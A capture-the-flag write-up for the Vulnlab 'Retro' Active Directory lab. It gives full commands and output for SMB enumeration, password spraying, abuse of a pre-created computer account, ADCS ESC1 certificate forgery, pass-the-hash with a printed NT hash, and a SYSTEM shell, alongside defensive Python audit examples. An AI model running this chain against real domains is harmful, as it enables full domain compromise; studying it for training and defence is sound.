Retro VL NMAP Scanning:

```
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49682/tcp open  unknown          syn-ack ttl 127
49701/tcp open  unknown          syn-ack ttl 127
```
SMB - NULL Authentication:

```
└─$ nxc smb 10.10.106.9 -u '' -p '' --shares
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\:
SMB  10.10.106.9  445  DC  [-] Error enumerating shares: STATUS_ACCESS_DENIED
```
SMB - Guest Authentication:

```
└─$ nxc smb 10.10.106.9 -u 'asdqweasd' -p '' --shares
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\asdqweasd: (Guest)
SMB  10.10.106.9  445  DC  [*] Enumerated shares
SMB  10.10.106.9  445  DC  Share     Permissions  Remark
SMB  10.10.106.9  445  DC  -----     -----------  ------
SMB  10.10.106.9  445  DC  ADMIN$                 Remote Admin
SMB  10.10.106.9  445  DC  C$                     Default share
SMB  10.10.106.9  445  DC  IPC$      READ         Remote IPC
SMB  10.10.106.9  445  DC  NETLOGON               Logon server share
SMB  10.10.106.9  445  DC  Notes
SMB  10.10.106.9  445  DC  SYSVOL                 Logon server share
SMB  10.10.106.9  445  DC  Trainees  READ
```
As the guest user we can read the ‘Trainees’ share, so let’s inspect it using impacket-smbclient:
```
└─$ impacket-smbclient DC.retrol.vl/guest:''@10.10.106.9
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use Trainees
# ls
drw-rw-rw-          0  Sun Jul 23 18:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw-        288  Sun Jul 23 18:16:11 2023 Important.txt
# cat Important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords. So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins
```
So the trainees’ passwords have been replaced with a single common, easy-to-remember one. Let’s first enumerate the users and then try to bruteforce their passwords:
```
└─$ nxc smb 10.10.106.9 -u 'asdqweasd' -p '' --rid-brute 10000
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\asdqweasd: (Guest)
SMB  10.10.106.9  445  DC  498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.106.9  445  DC  500: RETRO\Administrator (SidTypeUser)
SMB  10.10.106.9  445  DC  501: RETRO\Guest (SidTypeUser)
SMB  10.10.106.9  445  DC  502: RETRO\krbtgt (SidTypeUser)
SMB  10.10.106.9  445  DC  512: RETRO\Domain Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  513: RETRO\Domain Users (SidTypeGroup)
SMB  10.10.106.9  445  DC  514: RETRO\Domain Guests (SidTypeGroup)
SMB  10.10.106.9  445  DC  515: RETRO\Domain Computers (SidTypeGroup)
SMB  10.10.106.9  445  DC  516: RETRO\Domain Controllers (SidTypeGroup)
SMB  10.10.106.9  445  DC  517: RETRO\Cert Publishers (SidTypeAlias)
SMB  10.10.106.9  445  DC  518: RETRO\Schema Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  519: RETRO\Enterprise Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB  10.10.106.9  445  DC  521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.106.9  445  DC  522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB  10.10.106.9  445  DC  525: RETRO\Protected Users (SidTypeGroup)
SMB  10.10.106.9  445  DC  526: RETRO\Key Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB  10.10.106.9  445  DC  571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB  10.10.106.9  445  DC  572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB  10.10.106.9  445  DC  1000: RETRO\DC$ (SidTypeUser)
SMB  10.10.106.9  445  DC  1101: RETRO\DnsAdmins (SidTypeAlias)
SMB  10.10.106.9  445  DC  1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB  10.10.106.9  445  DC  1104: RETRO\trainee (SidTypeUser)
SMB  10.10.106.9  445  DC  1106: RETRO\BANKING$ (SidTypeUser)
SMB  10.10.106.9  445  DC  1107: RETRO\jburley (SidTypeUser)
SMB  10.10.106.9  445  DC  1108: RETRO\HelpDesk (SidTypeGroup)
SMB  10.10.106.9  445  DC  1109: RETRO\tblack (SidTypeUser)
```
From this output we can build a list of users (keeping only the SidTypeUser entries, so that group names such as ‘Domain Admins’ do not end up in the list):
```
└─$ cat rid_brute_output.txt | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt
└─$ cat users.txt
Administrator
Guest
DC$
trainee
BANKING$
jburley
tblack
```
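The awk/cut pipeline above breaks as soon as a name contains a space, and it needs the grep to drop groups. As an added example (not part of the original write-up), here is a small Python parser for the same `--rid-brute` output that separates user, computer and group principals explicitly. The sample lines are constructed from the output shown above; nothing is queried from a host.

```python
"""Parse NetExec (nxc) --rid-brute output into user, computer and group lists.

Added example; the sample text below is constructed from the output shown in
the post, and the parser is a plain regex over the "RID: DOMAIN\\Name (SidTypeX)"
tail of each line.
"""
import re

# Constructed sample: a subset of the --rid-brute output shown above.
SAMPLE_OUTPUT = """\
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\\asdqweasd: (Guest)
SMB  10.10.106.9  445  DC  500: RETRO\\Administrator (SidTypeUser)
SMB  10.10.106.9  445  DC  501: RETRO\\Guest (SidTypeUser)
SMB  10.10.106.9  445  DC  512: RETRO\\Domain Admins (SidTypeGroup)
SMB  10.10.106.9  445  DC  1000: RETRO\\DC$ (SidTypeUser)
SMB  10.10.106.9  445  DC  1101: RETRO\\DnsAdmins (SidTypeAlias)
SMB  10.10.106.9  445  DC  1104: RETRO\\trainee (SidTypeUser)
SMB  10.10.106.9  445  DC  1106: RETRO\\BANKING$ (SidTypeUser)
SMB  10.10.106.9  445  DC  1107: RETRO\\jburley (SidTypeUser)
"""

# One RID line: "<rid>: <DOMAIN>\<name> (<SidType>)"; the name may contain spaces.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(text):
    """Return a list of (rid, name, kind) tuples, skipping banner and auth lines."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append((int(m["rid"]), m["name"], m["kind"]))
    return entries


def split_principals(entries):
    """Split SidTypeUser entries into people and computer accounts (trailing '$').

    Groups and aliases are returned separately so a name like 'Domain Admins'
    never lands in a user list by accident.
    """
    users, computers, groups = [], [], []
    for _rid, name, kind in entries:
        if kind == "SidTypeUser":
            (computers if name.endswith("$") else users).append(name)
        else:
            groups.append(name)
    return users, computers, groups


if __name__ == "__main__":
    users, computers, groups = split_principals(parse_rid_brute(SAMPLE_OUTPUT))
    print("users:", users)
    print("computers:", computers)
    print("groups/aliases:", groups)
```

Keeping computer accounts in their own list matters later in this write-up, since they are the candidates for the pre-created computer account check.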
With the user list we can test whether any account’s password is the same as its username:
```
└─$ nxc smb 10.10.106.9 -u users.txt -p users.txt --no-brute --continue-on-success
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB  10.10.106.9  445  DC  [-] retro.vl\Guest:Guest STATUS_LOGON_FAILURE
SMB  10.10.106.9  445  DC  [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURE
SMB  10.10.106.9  445  DC  [+] retro.vl\trainee:trainee
SMB  10.10.106.9  445  DC  [-] retro.vl\BANKING$:BANKING$ STATUS_LOGON_FAILURE
SMB  10.10.106.9  445  DC  [-] retro.vl\jburley:jburley STATUS_LOGON_FAILURE
SMB  10.10.106.9  445  DC  [-] retro.vl\tblack:tblack STATUS_LOGON_FAILURE
```
So let’s see what kind of access we have with the user trainee:
```
└─$ nxc smb 10.10.106.9 -u 'trainee' -p 'trainee' --shares
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\trainee:trainee
SMB  10.10.106.9  445  DC  [*] Enumerated shares
SMB  10.10.106.9  445  DC  Share     Permissions  Remark
SMB  10.10.106.9  445  DC  -----     -----------  ------
SMB  10.10.106.9  445  DC  ADMIN$                 Remote Admin
SMB  10.10.106.9  445  DC  C$                     Default share
SMB  10.10.106.9  445  DC  IPC$      READ         Remote IPC
SMB  10.10.106.9  445  DC  NETLOGON  READ         Logon server share
SMB  10.10.106.9  445  DC  Notes     READ
SMB  10.10.106.9  445  DC  SYSVOL    READ         Logon server share
SMB  10.10.106.9  445  DC  Trainees  READ
```
Before inspecting the newly readable ‘Notes’ share, let’s pull the full user list from the domain, now that we have a valid domain user account:
```
└─$ nxc smb 10.10.106.9 -u 'trainee' -p 'trainee' --users
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\trainee:trainee
SMB  10.10.106.9  445  DC  -Username-      -Last PW Set-        -BadPW-  -Description-
SMB  10.10.106.9  445  DC  Administrator   2023-07-23 20:47:47  1        Built-in account for administering the computer/domain
SMB  10.10.106.9  445  DC  Guest           <never>              1        Built-in account for guest access to the computer/domain
SMB  10.10.106.9  445  DC  krbtgt          2023-07-23 21:08:46  0        Key Distribution Center Service Account
SMB  10.10.106.9  445  DC  trainee         2023-07-23 21:26:01  0
SMB  10.10.106.9  445  DC  jburley         2023-07-23 22:06:50  1
SMB  10.10.106.9  445  DC  tblack          2023-07-23 22:08:59  1
```
Now let’s inspect the ‘Notes’ share:
```
└─$ impacket-smbclient DC.retrol.vl/trainee:'trainee'@10.10.106.9
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use Notes
# ls
drw-rw-rw-          0  Sun Jul 23 18:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw-        248  Sun Jul 23 18:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me.

Best
James
```
ToDo.txt points us at pre-created computer accounts, so let’s dive into this topic and see what it is about: https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts

In short: if there is a machine account, for example TRAINEE$, and it is a pre-created computer account, its password will be the machine name without the dollar sign, i.e. TRAINEE or trainee (uppercase or lowercase). With this in mind, let’s check which accounts in our list follow this format and try to bruteforce their passwords:
```
└─$ cat users.txt
Administrator
Guest
DC$
trainee
BANKING$
jburley
tblack

┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/retro.vl]
└─$ nxc smb 10.10.106.9 -u 'BANKING$' -p 'banking' --shares
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
```
Instead of the STATUS_LOGON_FAILURE we got for the other accounts, BANKING$ returns a different error: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT.
When we see this error we can try to reset the account’s password with the following command:
```
└─$ impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.106.9 -newpass Password123456 -dc-ip 10.10.106.9 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
```
If you can’t reset the password, there is another route: use impacket-getTGT to obtain a Kerberos TGT for the account and then use that ticket for the actions you want to perform.
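From the defender’s side, the interesting question raised by the two paragraphs above is how to find such pre-created, never-joined computer accounts before someone else does. The following is an added example, not code from the original post or from the TrustedSec article: it applies a heuristic over constructed records shaped like the LDAP attributes `sAMAccountName`, `userAccountControl` and `logonCount`. The heuristic itself (workstation trust account, `PASSWD_NOTREQD` still set, never logged on) is an assumption to tune for your own directory; the bit values are the standard `userAccountControl` flag constants.

```python
"""Flag computer accounts that look like pre-created (never joined) machine accounts.

Added example. The input records are constructed (no directory is queried) and
the heuristic is an assumption: a workstation trust account that still carries
PASSWD_NOTREQD and has never logged on most likely never completed a domain join.
"""

# Standard userAccountControl bit values.
UF_PASSWD_NOTREQD = 0x0020
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_TRUSTED_FOR_DELEGATION = 0x80000

_FLAG_NAMES = {
    UF_PASSWD_NOTREQD: "PASSWD_NOTREQD",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    UF_SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    UF_TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
}


def decode_uac(uac):
    """Return the set of named flags (from the subset above) set in a userAccountControl value."""
    return {name for bit, name in _FLAG_NAMES.items() if uac & bit}


def looks_precreated(account):
    """Heuristic: workstation trust account + PASSWD_NOTREQD + never logged on."""
    flags = decode_uac(account["userAccountControl"])
    return (
        "WORKSTATION_TRUST_ACCOUNT" in flags
        and "PASSWD_NOTREQD" in flags
        and account.get("logonCount", 0) == 0
    )


def audit(accounts):
    """Return the sAMAccountNames of computer accounts that match the heuristic."""
    return [
        a["sAMAccountName"]
        for a in accounts
        if a["sAMAccountName"].endswith("$") and looks_precreated(a)
    ]


# Constructed sample records; values are made up for illustration.
SAMPLE_ACCOUNTS = [
    # A domain controller: server trust account, logs on constantly.
    {"sAMAccountName": "DC$",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "logonCount": 1532},
    # A joined workstation: normal trust account that has logged on.
    {"sAMAccountName": "WS01$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "logonCount": 41},
    # A pre-created account that was never joined: 4128 == 0x1000 | 0x0020.
    {"sAMAccountName": "BANKING$",
     "userAccountControl": 4128,
     "logonCount": 0},
    # A user account with PASSWD_NOTREQD: not a computer account, must be ignored here.
    {"sAMAccountName": "trainee",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD,
     "logonCount": 3},
]

if __name__ == "__main__":
    for name in audit(SAMPLE_ACCOUNTS):
        print("review:", name, "looks pre-created and never joined")
```

Accounts that this flags are candidates for deletion or for a password reset to a random value; either removes the predictable credential the write-up relies on.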
Now we can see that we can list shares using this account:
```
┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/retro.vl]
└─$ nxc smb 10.10.106.9 -u 'BANKING$' -p 'Password123456' --shares
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\BANKING$:Password123456
SMB  10.10.106.9  445  DC  [*] Enumerated shares
SMB  10.10.106.9  445  DC  Share     Permissions  Remark
SMB  10.10.106.9  445  DC  -----     -----------  ------
SMB  10.10.106.9  445  DC  ADMIN$                 Remote Admin
SMB  10.10.106.9  445  DC  C$                     Default share
SMB  10.10.106.9  445  DC  IPC$      READ         Remote IPC
SMB  10.10.106.9  445  DC  NETLOGON  READ         Logon server share
SMB  10.10.106.9  445  DC  Notes     READ
SMB  10.10.106.9  445  DC  SYSVOL    READ         Logon server share
SMB  10.10.106.9  445  DC  Trainees  READ
```
Enumerate Active Directory Certificate Services:

```
└─$ nxc ldap 10.10.106.9 -u 'BANKING$' -p 'Password123456' -M adcs
SMB   10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP  10.10.106.9  389  DC  [+] retro.vl\BANKING$:Password123456
ADCS  10.10.106.9  389  DC  [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS  10.10.106.9  389  DC  Found PKI Enrollment Server: DC.retro.vl
ADCS  10.10.106.9  389  DC  Found CN: retro-DC-CA
```
So ADCS is present, with a CA named retro-DC-CA. To enumerate the vulnerable templates we use certipy:
```
└─$ certipy-ad find -u trainee@retro.vl -p trainee -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Failed to resolve: RETRO.VL
[!] Failed to resolve: RETRO.VL
[-] Got error: invalid server address
[-] Use -debug to print a stacktrace

┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/retro.vl]
└─$ certipy-ad find -u trainee@10.10.106.9 -p trainee -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
```
So the RetroClients certificate template is vulnerable to ESC1: Domain Computers can enroll, the enrollee supplies the subject, and the template allows client authentication. That is why the request is made with BANKING$ rather than trainee: as a computer account it is a member of Domain Computers and therefore holds the enrollment right. Note also the minimum RSA key length of 4096, which the request has to honour.
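To make the ESC1 preconditions explicit (and to show what breaks the chain when a template is fixed), here is an added example that is not Certipy’s code. It evaluates the same preconditions Certipy reports against a constructed dict mirroring the RetroClients fields printed above; the set of principals treated as low-privileged is an assumption to tune for your domain.

```python
"""Check a certificate template for the ESC1 precondition set.

Added example, not Certipy's own code. RETRO_CLIENTS is constructed from the
Certipy output shown above; LOW_PRIV_PRINCIPALS is an assumption.
"""

# Principals a defender would treat as "effectively anyone" (assumption, tune per domain).
LOW_PRIV_PRINCIPALS = {
    "Authenticated Users", "Domain Users", "Domain Computers", "Everyone",
}


def _short(principal):
    """Strip the 'DOMAIN\\' prefix Certipy prints, e.g. 'RETRO.VL\\Domain Computers'."""
    return principal.split("\\", 1)[-1]


def esc1_findings(template, low_priv=LOW_PRIV_PRINCIPALS):
    """Return the list of ESC1 preconditions that hold, or [] if any one is missing.

    ESC1 needs all of: template enabled, no manager approval, no authorized
    signatures, an EKU that allows client authentication (or Any Purpose),
    enrollee supplies subject, and an enrollment right held by a low-privileged
    principal. Any single missing condition breaks the chain, so the result is
    all-or-nothing.
    """
    reasons = []
    if template["Enabled"]:
        reasons.append("enabled")
    if not template["Requires Manager Approval"]:
        reasons.append("no manager approval")
    if template["Authorized Signatures Required"] == 0:
        reasons.append("no authorized signatures required")
    if template["Client Authentication"] or template["Any Purpose"]:
        reasons.append("allows client authentication")
    if template["Enrollee Supplies Subject"]:
        reasons.append("enrollee supplies subject")
    enrollers = {_short(p) for p in template["Enrollment Rights"]} & low_priv
    if enrollers:
        reasons.append("low-privileged enrollment by " + ", ".join(sorted(enrollers)))
    return reasons if len(reasons) == 6 else []


# Constructed from the Certipy output shown above.
RETRO_CLIENTS = {
    "Template Name": "RetroClients",
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Enrollment Rights": [
        "RETRO.VL\\Domain Admins",
        "RETRO.VL\\Domain Computers",
        "RETRO.VL\\Enterprise Admins",
    ],
}


def remediated(template):
    """Return a copy with the usual fix applied: the CA builds the subject from AD
    instead of letting the enrollee supply it. Requiring manager approval would
    also break the chain."""
    fixed = dict(template)
    fixed["Enrollee Supplies Subject"] = False
    return fixed


if __name__ == "__main__":
    print("RetroClients ESC1:", esc1_findings(RETRO_CLIENTS))
    print("after fix:", esc1_findings(remediated(RETRO_CLIENTS)))
```

The all-or-nothing return mirrors how the finding should be read: removing any one of the six conditions is enough, and clearing “Enrollee Supplies Subject” (or restricting enrollment rights to the principals that actually need the template) is the usual fix.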
The command to abuse it:
```
└─$ certipy-ad req -u 'BANKING$'@10.10.106.9 -p Password123456 -ca retro-DC-CA -upn Administrator -template RetroClients -target 10.10.106.9 -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
Now, with the Administrator’s pfx, we can authenticate with it:
```
└─$ certipy-ad auth -pfx administrator.pfx -username Administrator -dc-ip 10.10.106.9 -domain retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
```
We can use the NT hash to act as Administrator, in this case a Domain Admin:
```
└─$ nxc smb 10.10.106.9 -u 'Administrator' -H 252fac7066d93dd009d4fd2cd0368389
SMB  10.10.106.9  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB  10.10.106.9  445  DC  [+] retro.vl\Administrator:252fac7066d93dd009d4fd2cd0368389 (Pwn3d!)
```
Now we can use impacket-smbexec (psexec-style) to get a shell and grab the flags:
```
└─$ impacket-smbexec retro.vl/Administrator@10.10.106.9 -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
```